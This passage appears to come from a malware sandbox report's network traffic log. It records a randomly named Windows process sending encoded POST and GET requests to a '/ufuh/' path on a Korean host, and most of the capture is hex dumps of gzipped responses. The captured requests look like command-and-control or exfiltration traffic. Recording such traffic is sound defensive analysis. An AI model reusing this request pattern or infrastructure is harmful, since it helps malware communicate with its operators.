Jun 3, 2024 08:54:20.729741096 CEST	769	IN	Data Raw: c8 4a 33 18 e4 3a ec cc 94 b3 4c 3a b3 58 5f 26 33 f5 2a 87 4f 9d fc f4 29 c0 47 57 c3 37 a0 55 2d 8e 69 87 23 44 cb d7 af 58 4c be c6 e7 ca 35 74 d7 38 cf 05 ee 5b df 92 84 df db 90 6a fc b2 7a af 85 36 12 aa a9 74 e3 55 a3 2a 83 08 63 f2 c6 51 Data Ascii: J3:L:X_&3O)GW7U-i#DXL5t8[jz6tUcQ4%[{H`qy[#TNaS[6)jeguQiS\\JWYW(96RXIB}'Zd VpDkBu-XX9]K$] [X_
Jun 3, 2024 08:54:20.731306076 CEST	1236	IN	Data Raw: 62 35 66 0d 0a ec 1d 6b 8f db c6 f1 f3 09 f0 7f 58 6c 50 f8 d1 23 29 ea 79 3e 4b 6a 6b c7 46 82 e4 e0 c2 46 5b 14 6d 21 50 22 75 c7 33 25 b2 22 75 b2 1c 1c 90 20 46 91 c4 68 80 00 0d 6a 04 4e e1 00 29 9a b4 1f 7a 48 5d e4 3e 14 fd 41 96 ee 3f 74 Data Ascii: b5fkXlP#)y>KjkFF[m!P"u3%"u FhjN)zH]>A?tfvI:}FN"13;;;LF?d4RP\|6Z}f@E-,raX0!)'j\AF*qlFaB~\|XDW]S'N01!GX(
Jun 3, 2024 08:54:20.731332064 CEST	1236	IN	Data Raw: eb 98 2f b1 c1 19 b2 7e 0d 1a 7c b6 82 4e f8 62 5a 26 ee 62 ba f5 62 b3 e0 e5 34 3d b1 f3 aa 01 9d 48 26 52 a9 bc 8b c4 9c 47 fb 67 46 fa f9 b4 ff 6c b5 dc 7c 0e ac a2 eb ce 87 03 e7 37 04 66 14 c0 f9 30 e0 ec 34 1f f9 53 5b d2 68 58 04 b1 ab af Data Ascii: /~\|NbZ&bb4=H&RGgFl\|7f04S[hXXS~imoANwz5@tbmu0\|5FED=k-g5s&C;c}dopMH?5`d7hnvGO~0[L~Chn.)~?"i'

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
31	192.168.2.22	49193	183.111.183.31	80	2580	C:\Program Files (x86)\bbewLzKhTmIizyBHPfTQLVBFmUELAksPgbjusXrPyBG\sjXzOwQzEuZimVPkzDSNXdqUsvZdr.exe

Timestamp	Bytes transferred	Direction	Data
Jun 3, 2024 08:54:21.872911930 CEST	746	OUT	POST /ufuh/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate, br Content-Length: 201 Cache-Control: no-cache Connection: close Content-Type: application/x-www-form-urlencoded Host: www.jnkinteractive.co.kr Origin: http://www.jnkinteractive.co.kr Referer: http://www.jnkinteractive.co.kr/ufuh/ User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36 Data Raw: 5a 58 64 70 3d 4a 5a 4b 78 62 51 54 58 56 47 71 65 42 56 37 7a 41 4b 47 61 67 62 6c 77 71 61 71 50 48 35 59 46 6f 59 70 78 47 38 64 54 6d 39 72 42 4e 4d 63 65 44 34 77 4f 4a 41 4d 37 6d 75 4e 54 42 79 68 2b 48 62 4d 43 48 49 73 61 68 6f 65 77 7a 79 2b 54 42 4d 71 71 6b 41 43 63 47 4d 6c 4d 75 67 51 47 32 4f 50 62 71 2f 79 6c 39 72 72 4d 2f 76 69 33 4a 4e 73 33 36 4b 5a 45 6e 65 52 6e 33 77 42 6b 47 4c 53 76 38 4a 30 42 41 6b 69 30 79 47 66 55 76 55 41 64 63 43 53 54 4b 43 43 4d 38 55 39 46 4e 61 33 6e 57 5a 74 78 30 69 37 66 39 48 7a 55 34 64 61 2b 32 54 62 77 58 34 33 53 79 2b 4b 47 4f 41 3d 3d Data Ascii: ZXdp=JZKxbQTXVGqeBV7zAKGagblwqaqPH5YFoYpxG8dTm9rBNMceD4wOJAM7muNTByh+HbMCHIsahoewzy+TBMqqkACcGMlMugQG2OPbq/yl9rrM/vi3JNs36KZEneRn3wBkGLSv8J0BAki0yGfUvUAdcCSTKCCM8U9FNa3nWZtx0i7f9HzU4da+2TbwX43Sy+KGOA==
Jun 3, 2024 08:54:23.202323914 CEST	1236	IN	HTTP/1.1 404 Not Found Server: openresty Date: Mon, 03 Jun 2024 06:54:23 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Vary: Accept-Encoding Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Link: <https://jnkinteractive.co.kr/wp-json/>; rel="https://api.w.org/" Content-Encoding: gzip Data Raw: 64 34 33 0d 0a 1f 8b 08 00 00 00 00 00 00 03 c4 5a 6f 6f db c6 19 7f 3d 7f 0a 8a c5 6c b2 21 29 4a 76 1c 8f 32 93 b6 ae 3b 74 4b 97 22 4e 50 14 b1 11 9c c8 93 74 36 c5 63 ef 8e 96 55 45 40 87 0d c3 d0 6e 7d d3 0d 2b 86 0e d8 80 02 1b f6 aa d8 1f 34 2f f6 89 12 e7 3b ec b9 3b 4a a2 24 aa 8e 1d 77 43 02 8a bc 7b ee 79 9e fb 3d 7f 8f f4 6e ed ed 7b 7b 0f 3e 7c 7f df e8 89 7e 72 7b 6d 57 fe 18 09 4a bb a1 79 42 dd 9f de 37 e5 18 46 f1 ed b5 1f ec f6 b1 40 46 d4 43 8c 63 11 9a 0f 1f bc e3 ee 98 46 7d 3a 93 a2 3e 0e cd 53 82 07 19 65 c2 34 22 9a 0a 9c 02 e5 80 c4 a2 17 c6 f8 94 44 d8 55 0f 8e 41 52 22 08 4a 5c 1e a1 04 87 0d c5 a7 c4 66 83 d1 36 15 7c 63 ca 64 23 a5 24 8d f1 99 63 74 68 92 d0 c1 86 5c 00 92 6b ae 6b 3c e8 11 6e 70 22 b0 01 bf 34 13 a4 4f 3e c6 b1 31 20 a2 67 88 1e 36 3e a4 88 0b e3 60 ff 9e 91 25 79 97 a4 c6 69 b3 e9 ed 18 2e ec 59 64 3c a8 d7 87 92 c0 8b 68 bf 3e a0 2c ce 18 e6 bc ae 49 79 9d 63 5a 37 5c 77 ba cb 8c d1 0c 33 31 0c 4d da 0d 12 2a d5 2f 6d f5 84 3e 06 cc 4a a0 cc 91 0b 22 [TRUNCATED] Data Ascii: d43Zoo=l!)Jv2;tK"NPt6cUE@n}+4/;;J$wC{y=n{{>\|~r{mWJyB7F@FCcF}:>Se4"DUAR"J\f6\|cd#$cth\kk<np"4O>1 g6>`%yi.Yd<h>,IycZ7\w31M/m>J"_\|uO}q_g_{uq/o?\|7o?~s+eK\|KlK_I!XeYB"$MI\|$T{.CY=2PZ30'f$e]1# 2>]I'x1r6ms\DT8f5"J`i+WL8@~}y7\|Fp0#iwlK,3QN%1IzRARn]vT*=n]^MHzb0q]Qo]Q2V(4HE0o:^5u>ix<+S`\FeqOk919Bkr#4Ffq:XK:C`a]->7<
Jun 3, 2024 08:54:23.202339888 CEST	212	IN	Data Raw: 0f eb b7 9a 67 b7 9a 87 32 e6 75 fe f1 b2 54 66 1c 7e da bd 1a 3f 58 a8 b8 c1 ef be 66 08 77 f2 99 e6 2c c2 32 aa 21 d7 01 dc 6a 59 c1 5f b1 af c2 e3 b0 3e c8 20 48 a3 24 8f a5 c0 63 ae 06 d4 52 17 ac 89 61 d7 5e 1f 22 ec 98 df 39 c5 2c dc f6 b6 Data Ascii: g2uTf~?Xfw,2!jY_> H$cRa^"9,-s<n_J!(kNc'GnM2JL`J+~X)oc;EIu,{P9OxvmQ'~B:CKzRx
Jun 3, 2024 08:54:23.202512980 CEST	1236	IN	Data Raw: 3c 15 9f 59 20 43 aa 06 60 c0 56 d9 7d 1c 09 cb 77 7c 07 9e 51 7a 8a c0 1e aa 7d 98 3e f6 30 e9 f6 84 0d 03 b0 6b 48 92 67 c2 12 40 ee db 2d bd 01 a9 e5 43 c0 78 b3 f9 26 63 68 68 61 0f f2 ec bb d2 98 a0 3b 7a 19 d6 5e 0c 84 b6 c3 42 eb 15 74 4a Data Ascii: <Y C`V}w\|Qz}>0kHg@-Cx&chha;z^BtJNuic9Kap5+gI!{$\|0<$kB<a~0o~mtK+sdZ#;ti.Ni&%{}\[>\[ffWZT\|xa4rsi_D-e";h
Jun 3, 2024 08:54:23.202534914 CEST	1236	IN	Data Raw: 53 17 36 d6 e7 81 56 72 b6 c0 4d d0 90 e6 c2 55 34 4e f1 66 d7 6e c9 d0 eb 32 0a 50 b9 73 0e da 8a 09 cf 60 49 d0 49 f0 59 4b 5e dc 98 30 ac 42 7b 25 ef 29 c5 8c bf 5a 39 60 28 5b b9 48 4e 3a f2 62 b7 8e 73 2e a0 6e b9 c5 bb cf 95 4b 0a ba a9 94 Data Ascii: S6VrMU4Nfn2Ps`IIYK^0B{%)Z9`([HN:bs.nK8HpF6]6bc\%P+)`k[3&Zzof/6(LpUNyKl8f/8\8_%\J@O$f&Gmz&-(m@iF.`3JfGg
Jun 3, 2024 08:54:23.202786922 CEST	1236	IN	Data Raw: 0b 96 af 88 61 b4 5c 90 77 0c 33 de b1 37 ad 5c 36 d2 13 67 e4 8d ab 18 45 42 6a d5 4a f9 35 90 51 ba d0 92 e7 6d 37 8b 43 42 1b f2 b4 81 9d 1f 76 3b 48 1f b0 6a 96 a4 68 64 a7 75 f6 98 c9 f4 f6 d6 f3 a6 cb 45 72 6f bf 3c 1a 1d 1e 16 73 8f f9 3c Data Ascii: a\w37\6gEBjJ5Qm7CBv;HjhduEro<s<d~Q\|EQ='IO[N.O#ZsQH~HjUu!yTtP!\|Lntq/{`O Z] 9>Jh40[Ts?R< z:0j&
Jun 3, 2024 08:54:23.202821970 CEST	1236	IN	Data Raw: b9 c7 fc d8 cb c5 7b 8c 7b 31 f3 03 af 55 ba c5 a2 51 83 9a a7 a3 69 18 f8 84 83 0e 13 e6 15 c3 80 8d 13 e6 7b b2 f1 2a 55 84 c8 62 34 e8 89 6e 96 af 89 92 e3 c0 bd 29 0b 23 f8 d7 26 dc ac 15 80 d8 aa 0f 6b b8 09 3c 88 99 fc 29 6c 20 9a c1 80 84 Data Ascii: {{1UQi{*Ub4n)#&k<)l M/w-\|N_D!k63GoA@06dqM[FI_#C{ xF)Er~i]n0h'QX$6ub\|])3^HO&
Jun 3, 2024 08:54:23.202847958 CEST	1057	IN	Data Raw: 37 a3 5f ad e0 6b f7 f0 0f 1b 22 9b 8c f7 1f 29 9b 94 3f 7c c0 4a 61 34 1f 3c 57 fb 2e 22 bc 19 2f 71 41 4f ad 9f 55 c3 bd 2d a7 77 ef ff b8 5e 08 c5 70 62 d0 49 ad 7c 06 e1 da ec 35 7b c9 37 8d 38 74 f2 c3 4e 53 9c 02 71 e8 10 88 58 e6 13 07 dd Data Ascii: 7_k")?\|Ja4<W."/qAOU-w^pbI\|5{78tNSqXUrjjS{Wf\r\|f`\mD7H)'Fi`efCn{%\kU03fo[_QHs~<UNwqL9vw{$d:#8)^cp*
Jun 3, 2024 08:54:23.203605890 CEST	1236	IN	Data Raw: 62 35 66 0d 0a ec 1d 6b 8f db c6 f1 f3 09 f0 7f 58 6c 50 f8 d1 23 29 ea 79 3e 4b 6a 6b c7 46 82 e4 e0 c2 46 5b 14 6d 21 50 22 75 c7 33 25 b2 22 75 b2 1c 1c 90 20 46 91 c4 68 80 00 0d 6a 04 4e e1 00 29 9a b4 1f 7a 48 5d e4 3e 14 fd 41 96 ee 3f 74 Data Ascii: b5fkXlP#)y>KjkFF[m!P"u3%"u FhjN)zH]>A?tfvI:}FN"13;;;LF?d4RP\|6Z}f@E-,raX0!)'j\AF*qlFaB~\|XDW]S'N01!GX(
Jun 3, 2024 08:54:23.203643084 CEST	212	IN	Data Raw: eb 98 2f b1 c1 19 b2 7e 0d 1a 7c b6 82 4e f8 62 5a 26 ee 62 ba f5 62 b3 e0 e5 34 3d b1 f3 aa 01 9d 48 26 52 a9 bc 8b c4 9c 47 fb 67 46 fa f9 b4 ff 6c b5 dc 7c 0e ac a2 eb ce 87 03 e7 37 04 66 14 c0 f9 30 e0 ec 34 1f f9 53 5b d2 68 58 04 b1 ab af Data Ascii: /~\|NbZ&bb4=H&RGgFl\|7f04S[hXXS~imoANwz5@tbmu0\|5FED=k-g5s&C;c}dopMH?5`d7hnvGO~0[
Jun 3, 2024 08:54:23.203752995 CEST	1236	IN	Data Raw: 4c 7e 43 ba 68 ef b8 6e 10 0b 2e 29 7e 3f 19 22 ac 69 18 a6 ba 91 cb d5 e8 27 ff e4 90 a8 ce ad 7e df ed 97 f2 25 36 c4 e0 5a 2d cb 8c 6d 9e b2 e9 d6 b6 69 75 8c 81 13 c4 52 70 5b b4 54 a9 70 04 68 da 07 21 bc 61 c2 21 0e 6f d4 f6 e8 dc 21 96 9d Data Ascii: L~Chn.)~?"i'~%6Z-miuRp[Tph!a!o!:5L@R0<:bxr!YO,lI "='!X!3Xp\|*:g$:Oy=3;7"m 68X=o9..\|LO>M=}>\|xG
Jun 3, 2024 08:54:23.207324982 CEST	234	IN	Data Raw: 27 42 3c 68 75 6d 68 85 98 94 24 38 01 85 6a ae 33 0b 85 9a 27 3e cd 94 db 4a 51 2d b2 bc 52 61 05 b5 0a 9f 15 8c e4 a6 96 60 f2 28 e0 84 02 79 45 b5 ea 40 a1 2d 86 ff 3a cc 38 f8 0f cf 98 d6 d6 19 24 16 a0 94 2c 29 bf 01 22 ab 28 08 a1 a2 54 ee Data Ascii: 'B<humh$8j3'>JQ-Ra`(yE@-:8$,)"(T0G2Ct>+H)'#"XROg4AZFq5r1V4$6~ekn}I(~+oc}4<%E=:8K5KQh6ydN>;cCpX`

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
32	192.168.2.22	49194	183.111.183.31	80	2580	C:\Program Files (x86)\bbewLzKhTmIizyBHPfTQLVBFmUELAksPgbjusXrPyBG\sjXzOwQzEuZimVPkzDSNXdqUsvZdr.exe

Timestamp	Bytes transferred	Direction	Data
Jun 3, 2024 08:54:24.404314041 CEST	2472	OUT	POST /ufuh/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate, br Content-Length: 3625 Cache-Control: no-cache Connection: close Content-Type: application/x-www-form-urlencoded Host: www.jnkinteractive.co.kr Origin: http://www.jnkinteractive.co.kr Referer: http://www.jnkinteractive.co.kr/ufuh/ User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36 Data Raw: 5a 58 64 70 3d 4a 5a 4b 78 62 51 54 58 56 47 71 65 44 31 4c 7a 4d 4a 2b 61 33 72 6c 78 30 4b 71 50 56 35 59 42 6f 59 6c 78 47 34 6b 57 6d 75 48 42 4e 62 77 65 43 62 49 4f 50 41 4d 37 67 75 4d 61 46 79 68 52 48 61 6f 6b 48 4b 30 4b 68 71 79 77 79 52 32 54 51 65 79 74 73 51 43 53 43 4d 6c 50 75 67 51 58 32 4f 66 6c 71 2b 48 2b 39 72 7a 4d 38 62 61 33 49 39 73 34 31 71 5a 45 6e 65 52 72 33 77 42 4d 47 50 32 33 38 4d 55 52 42 57 71 30 79 6d 2f 55 74 30 38 53 4e 79 53 58 41 69 44 50 39 47 4d 64 44 4a 6e 61 53 37 64 70 30 67 6a 6d 33 48 7a 70 34 73 7a 31 38 53 62 68 51 50 79 53 2b 73 44 55 64 39 58 38 79 4d 51 64 45 43 51 51 44 44 32 79 4a 65 33 7a 65 4e 31 4f 37 43 48 43 67 54 32 55 63 41 32 35 62 43 67 34 36 65 73 73 50 72 66 46 34 4c 65 65 65 70 6d 54 58 6f 62 61 51 38 58 51 4f 6f 50 69 54 69 47 2f 68 44 4e 55 59 53 41 32 43 70 7a 4d 2b 61 59 36 51 4f 43 53 5a 78 51 6a 32 6d 71 39 44 56 6c 57 74 4a 53 62 79 6c 5a 77 57 48 38 76 7a 38 58 59 56 59 62 57 4a 45 69 4d 77 6c 32 67 55 71 33 42 42 71 4f 4e 37 [TRUNCATED] Data Ascii: ZXdp=JZKxbQTXVGqeD1LzMJ+a3rlx0KqPV5YBoYlxG4kWmuHBNbweCbIOPAM7guMaFyhRHaokHK0KhqywyR2TQeytsQCSCMlPugQX2Oflq+H+9rzM8ba3I9s41qZEneRr3wBMGP238MURBWq0ym/Ut08SNySXAiDP9GMdDJnaS7dp0gjm3Hzp4sz18SbhQPyS+sDUd9X8yMQdECQQDD2yJe3zeN1O7CHCgT2UcA25bCg46essPrfF4LeeepmTXobaQ8XQOoPiTiG/hDNUYSA2CpzM+aY6QOCSZxQj2mq9DVlWtJSbylZwWH8vz8XYVYbWJEiMwl2gUq3BBqON7Qap5B0z0rOMke04x15P+7km3KTnCj4SMG64KSr9XvgxeWD4RSpdivuYyvcgoHxVQTonY5Q8F3bczy/hS7nR9RgCEknsjN/vntW18x+nQC5Ej0P83rupIpRB9RzzzAdMdFUDJzg4cKMc7GNwKAAalgpD+ThRFRVZ5oEwUtkpNLzN8/TpgURrRArvjqg60aZ24mHnhaI+FpBnyeKssKowrpo0yinTB1Cdeu63EFF5ET9FEX84LHG+pFOwz/NNmPOF8i3b9afYo3xLnXocWJWcVjfc0S9rhwoRaiceioY6BhBSj6Ns9p8bj31wjEr0nrkizU++oxMRo3pJTZ1NHOK/GfuC2UU8/ZxU2p/6kgp3lgBh3TkimmrxwH4RA8Z2gUIIrwgEKnkxLSh4GGQBgi29rAS8OVPHvjOLXzvMUs/HRawHoRRseJiFagoCCZHzdGbs2wjmkqZJ3eo0ZgynLT9Lx74E2JLl97eUDsKnkZu8lO34xSn1yTEEy+qIb5WwD2QxcitxkwFVyjp2/KJQY0dHC9/mzyTHNg2YS5BoH6VOqeoUcqJy+hKU5FqRLe9dW6GOyfA9NDRfrr7r3r4oytxyIzKnLPOQLgV5CjP1cSOL4LSD21aRw6YQ3PbX6wDRUqOqAkfsG+xHUsPeOB2DudEjVN8NOOS3pPBAYfk [TRUNCATED]
Jun 3, 2024 08:54:24.409295082 CEST	1699	OUT	Data Raw: 61 2b 41 62 73 6d 65 30 57 67 51 62 50 76 51 66 78 56 59 6f 2b 46 65 69 77 48 67 4c 45 52 74 64 6e 73 4b 6e 61 38 35 65 49 6b 56 4c 48 33 65 75 43 7a 4b 36 46 67 64 49 5a 43 52 67 69 69 46 49 42 4a 76 4c 6d 44 62 38 31 32 34 76 45 36 6c 78 4e 79 Data Ascii: a+Absme0WgQbPvQfxVYo+FeiwHgLERtdnsKna85eIkVLH3euCzK6FgdIZCRgiiFIBJvLmDb8124vE6lxNyEIjtmkQ1CFxXwlcyKznvBkcih8MsYYFo9O8Ofwf130ecC/CV+N2gc1AkmMnssFtEC102uF04Jqc6K26ulmLm1PijAwXyZTTWFDqql4qSE3KiUwoYvW62JKi2ng5f2YFnGIJhASbPq3WZ6vP/czk2fAf9MQQgwn+ks
Jun 3, 2024 08:54:25.720773935 CEST	1236	IN	HTTP/1.1 404 Not Found Server: openresty Date: Mon, 03 Jun 2024 06:54:25 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Vary: Accept-Encoding Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Link: <https://jnkinteractive.co.kr/wp-json/>; rel="https://api.w.org/" Content-Encoding: gzip Data Raw: 64 34 33 0d 0a 1f 8b 08 00 00 00 00 00 00 03 c4 5a 6f 6f db c6 19 7f 3d 7f 0a 8a c5 6c b2 21 29 4a 76 1c 8f 32 93 b6 ae 3b 74 4b 97 22 4e 50 14 b1 11 9c c8 93 74 36 c5 63 ef 8e 96 55 45 40 87 0d c3 d0 6e 7d d3 0d 2b 86 0e d8 80 02 1b f6 aa d8 1f 34 2f f6 89 12 e7 3b ec b9 3b 4a a2 24 aa 8e 1d 77 43 02 8a bc 7b ee 79 9e fb 3d 7f 8f f4 6e ed ed 7b 7b 0f 3e 7c 7f df e8 89 7e 72 7b 6d 57 fe 18 09 4a bb a1 79 42 dd 9f de 37 e5 18 46 f1 ed b5 1f ec f6 b1 40 46 d4 43 8c 63 11 9a 0f 1f bc e3 ee 98 46 7d 3a 93 a2 3e 0e cd 53 82 07 19 65 c2 34 22 9a 0a 9c 02 e5 80 c4 a2 17 c6 f8 94 44 d8 55 0f 8e 41 52 22 08 4a 5c 1e a1 04 87 0d c5 a7 c4 66 83 d1 36 15 7c 63 ca 64 23 a5 24 8d f1 99 63 74 68 92 d0 c1 86 5c 00 92 6b ae 6b 3c e8 11 6e 70 22 b0 01 bf 34 13 a4 4f 3e c6 b1 31 20 a2 67 88 1e 36 3e a4 88 0b e3 60 ff 9e 91 25 79 97 a4 c6 69 b3 e9 ed 18 2e ec 59 64 3c a8 d7 87 92 c0 8b 68 bf 3e a0 2c ce 18 e6 bc ae 49 79 9d 63 5a 37 5c 77 ba cb 8c d1 0c 33 31 0c 4d da 0d 12 2a d5 2f 6d f5 84 3e 06 cc 4a a0 cc 91 0b 22 [TRUNCATED] Data Ascii: d43Zoo=l!)Jv2;tK"NPt6cUE@n}+4/;;J$wC{y=n{{>\|~r{mWJyB7F@FCcF}:>Se4"DUAR"J\f6\|cd#$cth\kk<np"4O>1 g6>`%yi.Yd<h>,IycZ7\w31M/m>J"_\|uO}q_g_{uq/o?\|7o?~s+eK\|KlK_I!XeYB"$MI\|$T{.CY=2PZ30'f$e]1# 2>]I'x1r6ms\DT8f5"J`i+WL8@~}y7\|Fp0#iwlK,3QN%1IzRARn]vT*=n]^MHzb0q]Qo]Q2V(4HE0o:^5u>ix<+S`\FeqOk919Bkr#4Ffq:XK:C`a]->7<
Jun 3, 2024 08:54:25.720793009 CEST	212	IN	Data Raw: 0f eb b7 9a 67 b7 9a 87 32 e6 75 fe f1 b2 54 66 1c 7e da bd 1a 3f 58 a8 b8 c1 ef be 66 08 77 f2 99 e6 2c c2 32 aa 21 d7 01 dc 6a 59 c1 5f b1 af c2 e3 b0 3e c8 20 48 a3 24 8f a5 c0 63 ae 06 d4 52 17 ac 89 61 d7 5e 1f 22 ec 98 df 39 c5 2c dc f6 b6 Data Ascii: g2uTf~?Xfw,2!jY_> H$cRa^"9,-s<n_J!(kNc'GnM2JL`J+~X)oc;EIu,{P9OxvmQ'~B:CKzRx
Jun 3, 2024 08:54:25.720813036 CEST	1236	IN	Data Raw: 3c 15 9f 59 20 43 aa 06 60 c0 56 d9 7d 1c 09 cb 77 7c 07 9e 51 7a 8a c0 1e aa 7d 98 3e f6 30 e9 f6 84 0d 03 b0 6b 48 92 67 c2 12 40 ee db 2d bd 01 a9 e5 43 c0 78 b3 f9 26 63 68 68 61 0f f2 ec bb d2 98 a0 3b 7a 19 d6 5e 0c 84 b6 c3 42 eb 15 74 4a Data Ascii: <Y C`V}w\|Qz}>0kHg@-Cx&chha;z^BtJNuic9Kap5+gI!{$\|0<$kB<a~0o~mtK+sdZ#;ti.Ni&%{}\[>\[ffWZT\|xa4rsi_D-e";h
Jun 3, 2024 08:54:25.720825911 CEST	1100	IN	Data Raw: 53 17 36 d6 e7 81 56 72 b6 c0 4d d0 90 e6 c2 55 34 4e f1 66 d7 6e c9 d0 eb 32 0a 50 b9 73 0e da 8a 09 cf 60 49 d0 49 f0 59 4b 5e dc 98 30 ac 42 7b 25 ef 29 c5 8c bf 5a 39 60 28 5b b9 48 4e 3a f2 62 b7 8e 73 2e a0 6e b9 c5 bb cf 95 4b 0a ba a9 94 Data Ascii: S6VrMU4Nfn2Ps`IIYK^0B{%)Z9`([HN:bs.nK8HpF6]6bc\%P+)`k[3&Zzof/6(LpUNyKl8f/8\8_%\J@O$f&Gmz&-(m@iF.`3JfGg
Jun 3, 2024 08:54:25.720839977 CEST	1236	IN	Data Raw: 65 34 61 0d 0a bc 5c 6d 6f e3 36 12 fe dc fe 0a 21 c1 a1 d1 1e 6d 48 94 2c cb 0e ee 70 68 8b c5 f5 c3 de 1d 6e d1 4f 87 c5 42 b6 e4 d8 a8 13 1b 7e d9 24 35 f2 df 6f 66 48 4a 14 45 bd 58 4a bb bb d9 d8 d4 cc 33 43 6a 34 33 1c 92 2a e7 23 62 d3 09 Data Ascii: e4a\mo6!mH,phnOB~$5ofHJEXJ3Cj43#b5mPq^_\|w:W?D$]Ka\w37\6gEBjJ5Qm7CBv;HjhduEro<s<d~Q\|EQ
Jun 3, 2024 08:54:25.720921993 CEST	212	IN	Data Raw: 61 50 f2 39 07 10 c7 59 ea af 96 4d d8 3a b5 98 64 34 51 8b 39 07 90 ce 16 13 3f ab e9 23 9e 76 6a b9 7b 98 46 1c 92 e3 a9 c5 6e f6 07 78 ec 0f 68 2e b3 9f 3f 7e e4 35 54 f9 7e 33 a0 0b c2 c9 4f 75 68 27 2c a0 08 b2 8f 11 fe 35 c8 f2 24 bb 32 79 Data Ascii: aP9YM:d4Q9?#vj{Fnxh.?~5T~3Ouh',5$2ys57&SLL$.'@R'4Bnv{{1UQi{*Ub4n)#&k<)
Jun 3, 2024 08:54:25.720933914 CEST	1236	IN	Data Raw: 6c 20 9a c1 80 84 cc 9f 4d da c4 2f 77 bb 2d ca 7c 4e 0e 10 5f f7 90 44 1f ce 8f 8d 02 a7 21 c8 0a f1 c6 6b 36 e7 33 9f e3 ad 9f b9 0e d7 47 00 6f 0c 0c 41 a8 da 40 d1 30 14 e6 11 a9 36 64 86 d1 9b 81 fe 71 de 06 02 c2 98 4d 5b 87 0f 86 09 46 49 Data Ascii: l M/w-\|N_D!k63GoA@06dqM[FI_#C{ xF)Er~i]n0h'QX$6ub\|])3^HO&W[f-$srOefE{,xlqkyGg9~4{
Jun 3, 2024 08:54:25.720953941 CEST	212	IN	Data Raw: 88 58 e6 13 07 dd 55 18 b5 72 6a 8e c6 6a 07 e8 11 0a 0d f0 9b 9d c6 86 53 dd 7b 57 ff 66 00 5c 19 72 ef db a8 d4 e2 90 7c b1 83 a8 66 d4 9e d1 b6 14 60 5c 6d ef 44 b7 37 48 e8 1b 29 c0 27 46 e5 69 60 65 ea 66 43 d5 ca 1f 6e 13 7b 25 c9 b5 d4 5c Data Ascii: XUrjjS{Wf\r\|f`\mD7H)'Fi`efCn{%\kU03fo[_QHs~<UNwqL9vw{$d:#8)^cp*-O,Tpx/X<`z)A/
Jun 3, 2024 08:54:25.720966101 CEST	769	IN	Data Raw: c8 4a 33 18 e4 3a ec cc 94 b3 4c 3a b3 58 5f 26 33 f5 2a 87 4f 9d fc f4 29 c0 47 57 c3 37 a0 55 2d 8e 69 87 23 44 cb d7 af 58 4c be c6 e7 ca 35 74 d7 38 cf 05 ee 5b df 92 84 df db 90 6a fc b2 7a af 85 36 12 aa a9 74 e3 55 a3 2a 83 08 63 f2 c6 51 Data Ascii: J3:L:X_&3O)GW7U-i#DXL5t8[jz6tUcQ4%[{H`qy[#TNaS[6)jeguQiS\\JWYW(96RXIB}'Zd VpDkBu-XX9]K$] [X_
Jun 3, 2024 08:54:25.722362041 CEST	1236	IN	Data Raw: 62 35 66 0d 0a ec 1d 6b 8f db c6 f1 f3 09 f0 7f 58 6c 50 f8 d1 23 29 ea 79 3e 4b 6a 6b c7 46 82 e4 e0 c2 46 5b 14 6d 21 50 22 75 c7 33 25 b2 22 75 b2 1c 1c 90 20 46 91 c4 68 80 00 0d 6a 04 4e e1 00 29 9a b4 1f 7a 48 5d e4 3e 14 fd 41 96 ee 3f 74 Data Ascii: b5fkXlP#)y>KjkFF[m!P"u3%"u FhjN)zH]>A?tfvI:}FN"13;;;LF?d4RP\|6Z}f@E-,raX0!)'j\AF*qlFaB~\|XDW]S'N01!GX(

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
33	192.168.2.22	49195	183.111.183.31	80	2580	C:\Program Files (x86)\bbewLzKhTmIizyBHPfTQLVBFmUELAksPgbjusXrPyBG\sjXzOwQzEuZimVPkzDSNXdqUsvZdr.exe

Timestamp	Bytes transferred	Direction	Data
Jun 3, 2024 08:54:26.931967974 CEST	469	OUT	GET /ufuh/?ZXdp=EbiRYmriZV7/HiPUOKeH2YEx7MyTQrgkk6gsaa5XxsDKCOU8Ma1/AS5omL8UMRh4O9IVNf1Nsq6o0EG0WMSPhA6OEupR23w6ucrxxNSq0Kjb577lAvo9ttp2iO4V&7jsp7=zz9xHbtX HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Language: en-US,en;q=0.5 Connection: close Host: www.jnkinteractive.co.kr User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
Jun 3, 2024 08:54:28.272857904 CEST	477	IN	HTTP/1.1 301 Moved Permanently Server: openresty Date: Mon, 03 Jun 2024 06:54:28 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 0 Connection: close Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 X-Redirect-By: WordPress Location: http://jnkinteractive.co.kr/ufuh/?ZXdp=EbiRYmriZV7/HiPUOKeH2YEx7MyTQrgkk6gsaa5XxsDKCOU8Ma1/AS5omL8UMRh4O9IVNf1Nsq6o0EG0WMSPhA6OEupR23w6ucrxxNSq0Kjb577lAvo9ttp2iO4V&7jsp7=zz9xHbtX

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
34	192.168.2.22	49196	208.91.197.13	80	2580	C:\Program Files (x86)\bbewLzKhTmIizyBHPfTQLVBFmUELAksPgbjusXrPyBG\sjXzOwQzEuZimVPkzDSNXdqUsvZdr.exe

